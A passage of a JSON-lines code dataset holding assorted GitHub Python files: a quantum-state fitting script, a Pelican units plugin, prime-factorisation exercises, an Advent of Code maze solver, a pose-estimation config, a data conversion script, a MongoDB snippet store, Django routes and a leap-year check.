zeta: learning rate, float\n frac: how often to break the GD and get random angles, float\n N: max number of iterations, int\n eps: max fidelity, float\n verbpse: whether to print out progress, bool\n __\n Returns:\n angles: angles for each component, 1x4 numpy array\n pred_rho: predicted state from angles, 4x4 numpy array\n '''\n bounds = [(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi)]\n\n def loss_fidelity(x0):\n pred_rho = alec_expr(x0)\n fidelity = get_fidelity(pred_rho, targ_rho)\n return 1-np.sqrt(fidelity)\n \n fval = brute(loss_fidelity, ranges=bounds).fval\n # compute results\n best_rho = alec_expr(*fval)\n best_fidelity = get_fidelity(best_rho, targ_rho)\n\n return targ_name, best_fidelity, best_rho, targ_rho\n\nif __name__=='__main__':\n from time import time\n from tqdm import trange\n targ = get_E1(np.pi/4, np.pi/2)\n targ_name = 'E1_45_90'\n N = 100\n # fidelity_ls = []\n # n_ls = []\n # t0 = time()\n # for l in trange(N):\n # _, n, best_fidelity, _, _, _,_, _, _ = alec_decompose(targ, targ_name, N=1000, verbose=False)\n # fidelity_ls.append(best_fidelity)\n # n_ls.append(n)\n # tf = time()\n # print('Average fidelity: ', np.mean(fidelity_ls))\n # print('SEM fidelity: ', np.std(fidelity_ls)/np.sqrt(N))\n # print('Average iterations: ', np.mean(n_ls))\n # print('SEM iterations: ', np.std(n_ls)/np.sqrt(N))\n # print('Time: ', tf-t0)\n \n fidelity_ls = []\n n_ls = []\n t0 = time()\n for l in trange(N):\n targ_name, best_fidelity, best_rho, targ_rho = alec_decompose_brute(targ, targ_name)\n fidelity_ls.append(best_fidelity)\n tf = time()\n print('Average fidelity: ', np.mean(fidelity_ls))\n print('SEM fidelity: ', np.std(fidelity_ls)/np.sqrt(N))\n print('Time: ', tf-t0)\n","repo_name":"Lynn-Quantum-Optics/Summer-2023","sub_path":"oscar/machine_learning/alec_expr.py","file_name":"alec_expr.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29503529951","text":"import logging\nimport re\n\nfrom pelican.settings import DEFAULT_CONFIG\nfrom pelican import contents, signals\n\nlogger = logging.getLogger(__name__)\n\ntry:\n import pint\nexcept ImportError:\n logger.fatal(\"Pint not found\")\n\ntry:\n import inflect\nexcept ImportError:\n logger.fatal(\"Inflect not found\")\n\n\ndef pluralizer(value):\n \"\"\"This procedure pluralizes the unit if it is not singular.\n\n\n Args:\n value ([Quantity]): [parameter takes in a pint quantity]\n\n Returns:\n [string]: [returns a formatted string of the magnitude with a pluralized or singular unit]\n \"\"\"\n\n if value.magnitude != 1:\n p = inflect.engine()\n return p.inflect(\n \"{magnitude} plural('{units}')\".format(\n magnitude=round(value.magnitude, DEFAULT_CONFIG[\"UNIT_PRECISION\"]),\n units=value.units,\n )\n )\n else:\n return \"{magnitude} {units}\".format(\n magnitude=round(value.magnitude, DEFAULT_CONFIG[\"UNIT_PRECISION\"]),\n units=value.units,\n )\n\n\ndef replacer(value):\n \"\"\"This procedure takes in markdown search for specified unit text and converts unit annotations\n\n Args:\n value ([string]): [parameter takes in the preprocess markdown]\n\n Returns:\n [string]: [returns the preprocess markdown with any unit annotations converted to alternate units]\n \"\"\"\n\n ureg = pint.UnitRegistry(autoconvert_offset_to_baseunit=True)\n ureg.default_system = DEFAULT_CONFIG[\"UNIT_SYSTEM\"]\n expression = value.group()[5:-1].strip()\n Q_ = ureg.Quantity\n\n if \"::\" in expression:\n unit, *other_units = expression.split(\"::\")\n unit = Q_(unit)\n converted_unit = \", \".join(\n [pluralizer(unit.to(other_unit)) for other_unit in other_units]\n )\n unit = pluralizer(unit)\n\n else:\n unit = pluralizer(Q_(expression))\n converted_unit = pluralizer(Q_(expression).to_base_units())\n\n html_unit = DEFAULT_CONFIG[\"UNIT_HTML_WRAPPER\"].format(\n unit=unit, converted=converted_unit\n )\n return html_unit\n\n\ndef initialized(pelican):\n \"\"\"Initializes default variables and then checks for changes to the default in the pelican.conf\n\n Args:\n pelican ([string]): [parameter takes in all the set variables in the pelican.conf]\n \"\"\"\n\n DEFAULT_CONFIG.setdefault(\"UNIT_SYSTEM\", \"SI\")\n DEFAULT_CONFIG.setdefault(\"UNIT_PRECISION\", 2)\n DEFAULT_CONFIG.setdefault(\"UNIT_HTML_WRAPPER\", \"{unit} ({converted})\")\n\n if pelican:\n pelican.settings.setdefault(\"UNIT_SYSTEM\", \"SI\")\n pelican.settings.setdefault(\"UNIT_PRECISION\", 2)\n pelican.settings.setdefault(\n \"UNIT_HTML_WRAPPER\", \"{unit} ({converted})\"\n )\n\n\ndef unit(content):\n \"\"\"checks the content for a unit annotation. If there is, it sends it for processing, else it skips the content\n\n Args:\n content ([string]): [contains the markdown content of each article or page entry in the corpus]\n \"\"\"\n\n if isinstance(content, contents.Static):\n return\n\n if content._content and (\"{unit:\" in content._content):\n pattern = re.compile(r\"\\{unit:([^}]+)\\}\")\n content._content = re.sub(pattern, replacer, content._content)\n\n\ndef register():\n \"\"\"Registers the plugin with the pelican signal system\"\"\"\n signals.initialized.connect(initialized)\n signals.content_object_init.connect(unit)\n","repo_name":"bnice5000/pelican_units","sub_path":"units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10856444759","text":"import doctest\nimport math\n\n\ndef est_premier(n):\n \"\"\"\n Détermine si n est un nombre premier.\n :param n: (int) Nombre n.\n :return: (bool) Résultat.\n\n >>> est_premier(3)\n True\n \"\"\"\n i = 1\n while i < math.sqrt(n):\n i += 1\n if n % i == 0:\n if i == n:\n return True\n else:\n return False\n return True\n\n\ndef premier_suivant(n):\n \"\"\"\n Détermine le premier nombre entier supérieur à n.\n :param n: (int) Nomnbre n.\n :return: (int) Nombre entier supérieur à n\n\n >>> premier_suivant(2)\n 3\n \"\"\"\n while True:\n n += 1\n if est_premier(n):\n return n\n\n\ndef affiche_premiers(n):\n \"\"\"\n Affiche tous les nombres premiers inférieurs à n\n :param n: (int) Nombre n.\n\n >>> affiche_premiers(5)\n 2\n 3\n \"\"\"\n i = 2\n while i < n:\n if est_premier(i):\n print(i)\n i += 1\n\n\ndef contient_puissance(n, p):\n \"\"\"\n Calcule la plus grande puissance de p tel que n soit divisible par celle-ci.\n :param n: (int) Nombre.\n :param p: (int) Nombre premier.\n :return: (int) Puissance de p.\n\n >>> contient_puissance(1024, 2)\n 10\n \"\"\"\n if not est_premier(p):\n return\n i = 0\n while n % p == 0:\n i += 1\n n //= p\n return i\n\n\ndef decomposition(n):\n \"\"\"\n Décomposer l'entier n comme le produit de puissances de nombres premiers.\n :param n: (int) Nombre.\n :return: (str) Expression de la décomposition.\n\n >>> decomposition(301158)\n '301158 = 2**1 * 3**4 * 11**1 * 13**2'\n \"\"\"\n i = 0\n quotient = n\n p = 2\n result = str(n) + \" = \"\n while quotient != 1:\n power = contient_puissance(quotient, p)\n if power < 1:\n p = premier_suivant(p)\n continue\n\n quotient = quotient // p ** power\n if i > 0:\n result += \" * \"\n result += str(p) + \"**\" + str(power)\n p = premier_suivant(p)\n i += 1\n return result\n\n\ndoctest.testmod()\n","repo_name":"SlamaFR/L1-S1-Algorithm-Programming","sub_path":"TP4/Ex 4.py","file_name":"Ex 4.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"45085858079","text":"from dataclasses import dataclass\nimport networkx as nx\nfrom itertools import combinations, permutations, chain, groupby\n\n\n@dataclass\nclass Point:\n x: int\n y: int\n\n def __getitem__(self, item):\n return self.x if item == 0 else self.y\n\n def __add__(self, other):\n return Point(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other):\n return Point(self.x - other.x, self.y - other.y)\n\n def __mul__(self, other: int):\n return Point(self.x * other, self.y * other)\n\n def __hash__(self):\n return self.x*100+self.y\n\n def __repr__(self):\n return f\"(x={self.x}, y={self.y})\"\n\n\ndef P(x, y) -> Point:\n return Point(x, y)\n\n\nclass Map:\n def __init__(self, init_size=P(1,1)):\n self.size = init_size\n self.tiles = {}\n self.default = \" \"\n\n def _update_boundary(self, point: Point):\n max_y = max(abs(self.size.y), abs(point.y)+1)\n max_x = max(abs(self.size.x), abs(point.x)+1)\n self.size = P(max_x, max_y)\n\n def _set_panel_value(self, point: Point, value):\n if not point.x in self.tiles:\n self.tiles[point.x] = {}\n self.tiles[point.x][point.y] = value\n\n def _panel_exists(self, point: Point):\n return (point.x in self.tiles) and (point.y in self.tiles[point.x])\n\n def __getitem__(self, point: Point):\n self._update_boundary(point)\n return self.tiles[point.x][point.y] if self._panel_exists(point) else self.default\n\n def __setitem__(self, point: Point, value):\n self._update_boundary(point)\n self._set_panel_value(point, value)\n\n\ndef node(level, point):\n return f\"l{level}-{point}\"\n\n\nclass Maze:\n def __init__(self, graph, portals, aa, zz):\n self.graph = graph\n self.portals = portals\n self.aa = aa\n self.zz = zz\n\n @classmethod\n def parse(cls, lines, size, hole_position, hole_size):\n\n def fill_map(size, lines):\n map = Map(init_size=size)\n for y, line in enumerate([l for l in lines.splitlines() if len(l)]):\n line = line.ljust(size.x)\n for x, c in enumerate(line):\n p = P(x, y)\n map[p] = c\n return map\n\n def detect_teleports(map, xit, yit, first_letter_offset, secont_letter_offset):\n for x in xit:\n for y in yit:\n p = P(x, y)\n c = map[p]\n fl = map[p+first_letter_offset]\n sl = map[p+secont_letter_offset]\n if c == '.' and 'A' <= fl <= 'Z' and 'A' <= sl <= 'Z':\n yield fl+sl, p\n\n def detect_portals(map, hole_position, hole_size):\n tl = hole_position + P(-1, -1)\n br = hole_position + hole_size\n tr = P(br.x, tl.y)\n bl = P(tl.x, br.y)\n outer_portals = list(chain(\n detect_teleports(map, range(2, size.x - 2), [2], P(0, -2), P(0, -1)), # top\n detect_teleports(map, range(2, size.x - 2), [size.y - 3], P(0, 1), P(0, 2)), # bottom\n detect_teleports(map, [2], range(2, size.y - 2), P(-2, 0), P(-1, 0)), # left\n detect_teleports(map, [size.x - 3], range(2, size.y - 2), P(1, 0), P(2, 0)), # right\n ))\n outer_portals = [(k, p, 'outer') for k, p in outer_portals]\n inner_portals = list(chain(\n detect_teleports(map, range(tl.x, tr.x), [tl.y], P(0, 1), P(0, 2)), # top\n detect_teleports(map, range(bl.x, br.x), [br.y], P(0, -2), P(0, -1)), # bottom\n detect_teleports(map, [tl.x], range(tl.y, bl.y), P(1, 0), P(2, 0)), # left\n detect_teleports(map, [tr.x], range(tr.y, br.y), P(-2, 0), P(-1, 0)), # right\n ))\n inner_portals = [(k, p, 'inner') for k, p in inner_portals]\n\n st = sorted(chain(outer_portals, inner_portals), key=lambda t: t[0])\n portals = {k: list(grp) for k, grp in groupby(st, key=lambda t: t[0])}\n aa = portals['AA'][0]\n zz = portals['ZZ'][0]\n portals.pop('AA')\n portals.pop('ZZ')\n return aa, zz, portals\n\n def build_level(g, map, level):\n for y in range(1, map.size.y - 1):\n for x in range(1, map.size.x - 1):\n p = P(x, y)\n c = map[p]\n if c == '.':\n for tp in [p + P(1, 0), p + P(-1, 0), p + P(0, -1), p + P(0, 1)]:\n tc = map[tp]\n if tc == '.':\n g.add_edge(node(level, p), node(level, tp), weight=1)\n\n def add_portal_connections(g, portals, fl, tl):\n for k, (p1, p2) in portals.items():\n if p1[2] == 'outer' and p2[2] == 'outer':\n g.add_edge(node(tl, p1[1]), node(tl, p2[1]), weight=1)\n if p1[2] == 'inner':\n g.add_edge(node(fl, p1[1]), node(tl, p2[1]), weight=1)\n if p2[2] == 'inner':\n g.add_edge(node(fl, p2[1]), node(tl, p1[1]), weight=1)\n\n map = fill_map(size, lines)\n aa, zz, portals = detect_portals(map, hole_position, hole_size)\n graph = nx.Graph()\n build_level(graph, map, 0)\n for level in range(1, 100):\n build_level(graph, map, level)\n add_portal_connections(graph, portals, level-1, level)\n return cls(graph, portals, aa, zz)\n\n def shortest_path(self):\n start_point = node(0, self.aa[1])\n end_point = node(0, self.zz[1])\n return nx.shortest_path_length(self.graph, start_point, end_point, weight='weight')\n\n def path(self, f, t):\n return nx.shortest_path(self.graph, f, t)\n\n # def __getitem__(self, item):\n # points = self.teleports[item]\n # if len(points) == 2:\n # if points[0].y > points[1].y:\n # return points[1], points[0]\n # elif points[0].y < points[1].y:\n # return points[0], points[1]\n # else:\n # return points[0], points[1]\n # else:\n # return points\n\n# s = Maze.parse(\"\"\"\n# A\n# A\n# #######.#########\n# #######.........#\n# #######.#######.#\n# #######.#######.#\n# #######.#######.#\n# ##### B ###.#\n# BC...## C ###.#\n# ##.## ###.#\n# ##...DE F ###.#\n# ##### G ###.#\n# #########.#####.#\n# DE..#######...###.#\n# #.#########.###.#\n# FG..#########.....#\n# ###########.#####\n# Z\n# Z\n# \"\"\", size=P(21, 19), hole_position=P(7,7), hole_size=P(7, 5))\n# assert s.shortest_path() == 26\n\n# s = Maze.parse(\"\"\"\n# A\n# A\n# #################.#############\n# #.#...#...................#.#.#\n# #.#.#.###.###.###.#########.#.#\n# #.#.#.......#...#.....#.#.#...#\n# #.#########.###.#####.#.#.###.#\n# #.............#.#.....#.......#\n# ###.###########.###.#####.#.#.#\n# #.....# A C #.#.#.#\n# ####### S P #####.#\n# #.#...# #......VT\n# #.#.#.# #.#####\n# #...#.# YN....#.#\n# #.###.# #####.#\n# DI....#.# #.....#\n# #####.# #.###.#\n# ZZ......# QG....#..AS\n# ###.### #######\n# JO..#.#.# #.....#\n# #.#.#.# ###.#.#\n# #...#..DI BU....#..LF\n# #####.# #.#####\n# YN......# VT..#....QG\n# #.###.# #.###.#\n# #.#...# #.....#\n# ###.### J L J #.#.###\n# #.....# O F P #.#...#\n# #.###.#####.#.#####.#####.###.#\n# #...#.#.#...#.....#.....#.#...#\n# #.#####.###.###.#.#.#########.#\n# #...#.#.....#...#.#.#.#.....#.#\n# #.###.#####.###.###.#.#.#######\n# #.#.........#...#.............#\n# #########.###.###.#############\n# B J C\n# U P P\n# \"\"\", size=P(35, 37), hole_position=P(9,9), hole_size=P(17, 19))\n# # print(list(s.graph.nodes()))\n# # print(list(s.graph.edges()))\n# # print(s.path(P(19,2), P(17, 8))) ## AA AS\n# # print(s.path(P(19,2), P(32, 17))) ## AA AS\n# assert s.shortest_path() == 58\n\n# s = Maze.parse(open(\"day20/input1.txt\").read(), size=P(121, 125), hole_position=P(33,33), hole_size=P(55, 59))\n# print(s.shortest_path())\n\n# s = Maze.parse(\"\"\"\n# Z L X W C\n# Z P Q B K\n# ###########.#.#.#.#######.###############\n# #...#.......#.#.......#.#.......#.#.#...#\n# ###.#.#.#.#.#.#.#.###.#.#.#######.#.#.###\n# #.#...#.#.#...#.#.#...#...#...#.#.......#\n# #.###.#######.###.###.#.###.###.#.#######\n# #...#.......#.#...#...#.............#...#\n# #.#########.#######.#.#######.#######.###\n# #...#.# F R I Z #.#.#.#\n# #.###.# D E C H #.#.#.#\n# #.#...# #...#.#\n# #.###.# #.###.#\n# #.#....OA WB..#.#..ZH\n# #.###.# #.#.#.#\n# CJ......# #.....#\n# ####### #######\n# #.#....CK #......IC\n# #.###.# #.###.#\n# #.....# #...#.#\n# ###.### #.#.#.#\n# XF....#.# RF..#.#.#\n# #####.# #######\n# #......CJ NM..#...#\n# ###.#.# #.###.#\n# RE....#.# #......RF\n# ###.### X X L #.#.#.#\n# #.....# F Q P #.#.#.#\n# ###.###########.###.#######.#########.###\n# #.....#...#.....#.......#...#.....#.#...#\n# #####.#.###.#######.#######.###.###.#.#.#\n# #.......#.......#.#.#.#.#...#...#...#.#.#\n# #####.###.#####.#.#.#.#.###.###.#.###.###\n# #.......#.....#.#...#...............#...#\n# #############.#.#.###.###################\n# A O F N\n# A A D M\n# \"\"\", size=P(45, 37), hole_position=P(9,9), hole_size=P(27, 19))\n# assert s.shortest_path() == 396\n\n\ns = Maze.parse(open(\"day20/input1.txt\").read(), size=P(121, 125), hole_position=P(33,33), hole_size=P(55, 59))\nprint(s.shortest_path())\n","repo_name":"kmamykin/adventofcode2019","sub_path":"day20/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1144169988","text":"_base_ = [\"./common_base.py\", \"./renderer_base.py\"]\n# -----------------------------------------------------------------------------\n# base model cfg for self6d-v2\n# -----------------------------------------------------------------------------\n\nrefiner_cfg_path = \"configs/_base_/self6dpp_refiner_base.py\"\n\nMODEL = dict(\n DEVICE=\"cuda\",\n WEIGHTS=\"\",\n REFINER_WEIGHTS=\"\",\n PIXEL_MEAN=[0, 0, 0], # to [0,1]\n PIXEL_STD=[255.0, 255.0, 255.0],\n SELF_TRAIN=False, # whether to do self-supervised training\n FREEZE_BN=False, # use frozen_bn for self-supervised training\n WITH_REFINER=False, # whether to use refiner\n # -----------\n LOAD_DETS_TRAIN=False, # NOTE: load detections for self-train\n LOAD_DETS_TRAIN_WITH_POSE=False, # load detections with pose_refine as pseudo pose\n PSEUDO_POSE_TYPE=\"pose_refine\", # pose_est | pose_refine | pose_init (online inferred by teacher)\n LOAD_DETS_TEST=False,\n BBOX_CROP_REAL=False, # whether to use bbox_128, for cropped lm\n BBOX_CROP_SYN=False,\n # -----------\n # Model Exponential Moving Average https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage\n # NOTE: momentum-based mean teacher\n EMA=dict(\n ENABLED=False,\n INIT_CFG=dict(decay=0.999, updates=0), # epoch-based\n UPDATE_FREQ=10, # update the mean teacher every n epochs\n ),\n POSE_NET=dict(\n NAME=\"GDRN\", # used module file name\n # NOTE: for self-supervised training phase, use offline labels should be more accurate\n XYZ_ONLINE=False, # rendering xyz online\n XYZ_BP=True, # calculate xyz from depth by backprojection\n NUM_CLASSES=13,\n USE_MTL=False, # uncertainty multi-task weighting, TODO: implement for self loss\n INPUT_RES=256,\n OUTPUT_RES=64,\n ## backbone\n BACKBONE=dict(\n FREEZE=False,\n PRETRAINED=\"timm\",\n INIT_CFG=dict(\n type=\"timm/resnet34\",\n pretrained=True,\n in_chans=3,\n features_only=True,\n out_indices=(4,),\n ),\n ),\n NECK=dict(\n ENABLED=False,\n FREEZE=False,\n LR_MULT=1.0,\n INIT_CFG=dict(\n type=\"FPN\",\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=4,\n ),\n ),\n ## geo head: Mask, XYZ, Region\n GEO_HEAD=dict(\n FREEZE=False,\n LR_MULT=1.0,\n INIT_CFG=dict(\n type=\"TopDownMaskXyzRegionHead\",\n in_dim=512, # this is num out channels of backbone conv feature\n up_types=(\"deconv\", \"bilinear\", \"bilinear\"), # stride 32 to 4\n deconv_kernel_size=3,\n num_conv_per_block=2,\n feat_dim=256,\n feat_kernel_size=3,\n norm=\"GN\",\n num_gn_groups=32,\n act=\"GELU\", # relu | lrelu | silu (swish) | gelu | mish\n out_kernel_size=1,\n out_layer_shared=True,\n ),\n XYZ_BIN=64, # for classification xyz, the last one is bg\n XYZ_CLASS_AWARE=False,\n MASK_CLASS_AWARE=False,\n REGION_CLASS_AWARE=False,\n MASK_THR_TEST=0.5,\n # for region classification, 0 is bg, [1, num_regions]\n # num_regions <= 1: no region classification\n NUM_REGIONS=64,\n ),\n ## for direct regression\n PNP_NET=dict(\n FREEZE=False,\n TRAIN_R_ONLY=False, # only train fc_r (only valid when FREEZE=False)\n LR_MULT=1.0,\n # ConvPnPNet | SimplePointPnPNet | PointPnPNet | ResPointPnPNet\n INIT_CFG=dict(\n type=\"ConvPnPNet\",\n norm=\"GN\",\n act=\"relu\",\n num_gn_groups=32,\n drop_prob=0.0, # 0.25\n denormalize_by_extent=True,\n ),\n WITH_2D_COORD=False, # using 2D XY coords\n COORD_2D_TYPE=\"abs\", # rel | abs\n REGION_ATTENTION=False, # region attention\n MASK_ATTENTION=\"none\", # none | concat | mul\n ROT_TYPE=\"ego_rot6d\", # {allo/ego}_{quat/rot6d/log_quat/lie_vec}\n TRANS_TYPE=\"centroid_z\", # trans | centroid_z (SITE) | centroid_z_abs\n Z_TYPE=\"REL\", # REL | ABS | LOG | NEG_LOG (only valid for centroid_z)\n ),\n LOSS_CFG=dict(\n # xyz loss ----------------------------\n XYZ_LOSS_TYPE=\"L1\", # L1 | CE_coor\n XYZ_LOSS_MASK_GT=\"visib\", # trunc | visib | obj\n XYZ_LW=1.0,\n # full mask loss ---------------------------\n FULL_MASK_LOSS_TYPE=\"BCE\", # L1 | BCE | CE\n FULL_MASK_LW=0.0,\n # mask loss ---------------------------\n MASK_LOSS_TYPE=\"L1\", # L1 | BCE | CE | RW_BCE | dice\n MASK_LOSS_GT=\"trunc\", # trunc | visib | gt\n MASK_LW=1.0,\n # region loss -------------------------\n REGION_LOSS_TYPE=\"CE\", # CE\n REGION_LOSS_MASK_GT=\"visib\", # trunc | visib | obj\n REGION_LW=1.0,\n # point matching loss -----------------\n NUM_PM_POINTS=3000,\n PM_LOSS_TYPE=\"L1\", # L1 | Smooth_L1\n PM_SMOOTH_L1_BETA=1.0,\n PM_LOSS_SYM=False, # use symmetric PM loss\n PM_NORM_BY_EXTENT=False, # 10. / extent.max(1, keepdim=True)[0]\n # if False, the trans loss is in point matching loss\n PM_R_ONLY=True, # only do R loss in PM\n PM_DISENTANGLE_T=False, # disentangle R/T\n PM_DISENTANGLE_Z=False, # disentangle R/xy/z\n PM_T_USE_POINTS=True,\n PM_LW=1.0,\n # rot loss ----------------------------\n ROT_LOSS_TYPE=\"angular\", # angular | L2\n ROT_LW=0.0,\n # centroid loss -----------------------\n CENTROID_LOSS_TYPE=\"L1\",\n CENTROID_LW=1.0,\n # z loss ------------------------------\n Z_LOSS_TYPE=\"L1\",\n Z_LW=1.0,\n # trans loss --------------------------\n TRANS_LOSS_TYPE=\"L1\",\n TRANS_LOSS_DISENTANGLE=True,\n TRANS_LW=0.0,\n # bind term loss: R^T@t ---------------\n BIND_LOSS_TYPE=\"L1\",\n BIND_LW=0.0,\n ),\n SELF_LOSS_CFG=dict(\n # LAB space loss ------------------\n LAB_NO_L=True,\n LAB_LW=0.0,\n # MS-SSIM loss --------------------\n MS_SSIM_LW=0.0,\n # perceptual loss -----------------\n # PERCEPT_CFG=\n PERCEPT_LW=0.0,\n # mask loss (init, ren) -----------------------\n MASK_WEIGHT_TYPE=\"edge_lower\", # none | edge_lower | edge_higher\n MASK_INIT_REN_LOSS_TYPE=\"RW_BCE\", # L1 | RW_BCE (re-weighted BCE) | dice\n MASK_INIT_REN_LW=1.0,\n # depth-based geometric loss ------\n GEOM_LOSS_TYPE=\"chamfer\", # L1, chamfer\n GEOM_LW=0.0, # 100\n CHAMFER_CENTER_LW=0.0,\n CHAMFER_DIST_THR=0.5,\n # refiner-based loss --------------\n REFINE_LW=0.0,\n # xyz loss (init, ren)\n XYZ_INIT_REN_LOSS_TYPE=\"L1\", # L1 | CE_coor (for cls)\n XYZ_INIT_REN_LW=0.0,\n # xyz loss (init, pred)\n XYZ_INIT_PRED_LOSS_TYPE=\"L1\", # L1 | smoothL1\n XYZ_INIT_PRED_LW=0.0,\n # region loss\n REGION_INIT_PRED_LW=0.0,\n # losses between init and pred ==========================\n # mask loss (init, pred) -----------------------\n MASK_TYPE=\"vis\", # vis | full\n MASK_INIT_PRED_LOSS_TYPE=\"RW_BCE\", # L1 | RW_BCE (re-weighted BCE)\n MASK_INIT_PRED_LW=0.0,\n MASK_INIT_PRED_TYPE=(\"vis\",), # (\"vis\",\"full\",)\n # point matching loss using pseudo pose ---------------------------\n SELF_PM_CFG=dict(\n loss_type=\"L1\",\n beta=1.0,\n reduction=\"mean\",\n loss_weight=0.0, # NOTE: >0 to enable this loss\n norm_by_extent=False,\n symmetric=True,\n disentangle_t=True,\n disentangle_z=True,\n t_loss_use_points=True,\n r_only=False,\n ),\n ),\n ),\n # some d2 keys but not used\n KEYPOINT_ON=False,\n LOAD_PROPOSALS=False,\n)\n\nTRAIN = dict(PRINT_FREQ=20, DEBUG_SINGLE_IM=False)\n\nTEST = dict(\n EVAL_PERIOD=0,\n VIS=False,\n TEST_BBOX_TYPE=\"est\", # gt | est\n USE_PNP=False, # use pnp or direct prediction\n SAVE_RESULTS_ONLY=False, # turn this on to only save the predicted results\n # ransac_pnp | net_iter_pnp (learned pnp init + iter pnp) | net_ransac_pnp (net init + ransac pnp)\n # net_ransac_pnp_rot (net_init + ransanc pnp --> net t + pnp R)\n PNP_TYPE=\"ransac_pnp\",\n PRECISE_BN=dict(ENABLED=False, NUM_ITER=200),\n)\n","repo_name":"THU-DA-6D-Pose-Group/self6dpp","sub_path":"configs/_base_/self6dpp_base.py","file_name":"self6dpp_base.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"16"} +{"seq_id":"1288579948","text":"import h5py # Store data files in .h5 format\nimport numpy as np\nimport pandas as pd\nfrom glob import glob # Read data files stored in pathnames following a pattern.\nimport matplotlib.pyplot as plt\n\n\ntrain_data_list , train_label_list = [],[]\ntest_data_list = []\n\n# Read training label from the CSV file\n\ndf_train_label = pd.read_csv('training_labels.csv')\n\n\n\n# read datfiles stored in folders based on the properties of BH signal\npaths_files = glob(\"test/*/*/*/*\")\npaths_files.sort()\n\nprint(paths_files[:10]) # To check everything is ok\n\ntrain_data = np.load(paths_files[0])\n\n\nfor i in range(560000):\n\ttrain_data_list.extend([np.load(paths_files[i]).T])\n\ttrain_label_list.append(df_train_label['target'][i])\n\n\ntrain_data = np.array(train_data_list)\ntrain_label = np.array(train_label_list)\ntrain_label.reshape((560000,1))\ndel train_data_list\ndel train_label_list\n\n# Check for the correct shapes\nprint(train_data.shape)\nprint(train_label.shape)\n\n# Store as HD5 file\nh5f1 = h5py.File('training_trial.h5', 'w')\nh5f1.create_dataset('train_data', data=train_data)\nh5f1.create_dataset('train_label', data=train_label)\nh5f1.close()","repo_name":"kpal002/Gravitational_Wave_Detection","sub_path":"Data_Mining_Project/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5658581782","text":"from pymongo import MongoClient\nfrom uuid import uuid4\nimport random\nimport datetime\nimport requests\n\nclass Database:\n def __init__(self, URL, AIRKEY):\n self.client = MongoClient(URL)\n self.db = self.client.Snipper\n self.users = self.db.users\n self.snips = self.db.snips\n \n def addUser(self, email):\n name = requests.get('http://names.drycodes.com/1').json()[0]\n id =str(uuid4())\n self.users.insert_one({\n '_id': id,\n 'username': name,\n 'email': email,\n 'avatar': f'https://avatars.dicebear.com/api/bottts/{id}.svg',\n 'snips': [],\n 'saves': [],\n 'created': datetime.datetime.now().strftime(\"%d %B %Y, %I:%M:%S %p\")\n })\n \n def userExists(self, email):\n return self.users.find_one({'email': email}) is not None\n \n def getUser(self, email):\n return self.users.find_one({'email': email})\n \n def getUserWithId(self, id):\n return self.users.find_one({'_id': id})\n \n def updateName(self, email, name):\n self.users.update_one({'email': email}, {'$set': {'username': name}})\n return True\n \n def uploadSnip(self, email, snip, name, description, language, theme):\n id = str(uuid4())\n user = self.getUser(email)\n self.snips.insert_one({\n '_id': id,\n 'by': email,\n 'name': name,\n 'description': description,\n 'snip': snip,\n 'language': language,\n 'theme': theme,\n 'created': datetime.datetime.now().strftime(\"%d %B %Y, %I:%M:%S %p\")\n })\n self.users.update_one({'_id': user['_id']}, {'$push': {'snips': id}})\n return id\n \n def getSnip(self, id):\n snip = self.snips.find_one({'_id': id})\n snip['by'] = self.getUser(snip['by'])\n return snip\n # return \n \n def getUserSnips(self, email):\n user = self.getUser(email)\n return [self.getSnip(snip) for snip in user['snips']]\n \n def saveSnip(self, snipId, email):\n user = self.getUser(email)\n if snipId in user['saves']:\n return False\n self.users.update_one({'_id': user['_id']}, {'$push': {'saves': snipId}})\n return True\n \n def removeSnip(self, snipId, email):\n user = self.getUser(email)\n if snipId not in user['saves']:\n return False\n self.users.update_one({'_id': user['_id']}, {'$pull': {'saves': snipId}})\n return True\n \n def delteSnip(self, snipId, email):\n user = self.getUser(email)\n self.snips.delete_one({'_id': snipId})\n self.users.update_one({'_id': user['_id']}, {'$pull': {'snips': snipId}})\n \n def get10RandomSnips(self):\n snips = self.snips.aggregate([\n {'$sample': {'size': 10}}\n ])\n return list(snips)","repo_name":"studiousgamer/Snipper","sub_path":"databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8817895326","text":"from django.urls import path\nfrom post.views import index, NewPost, PostDetails, tags, like, favorite\n\n\nurlpatterns = [\n \tpath('', index, name='index'),\n \tpath('newpost/', NewPost, name='newpost'),\n \tpath('', PostDetails, name='postdetails'),\n \tpath('/like', like, name='postlike'),\n \tpath('/favorite', favorite, name='postfavorite'),\n \tpath('tag/', tags, name='tags'),\n]","repo_name":"byronlara5/django_instagram_clone_youtube","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"16"} +{"seq_id":"11341301030","text":"#!/usr/bin/python3\n# evaluate if the year entered is leep year or not\ndef is_leap(year):\n leap = False\n if year % 4 == 0:\n if year % 100 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n return True\n\n return leap\n\nyear = 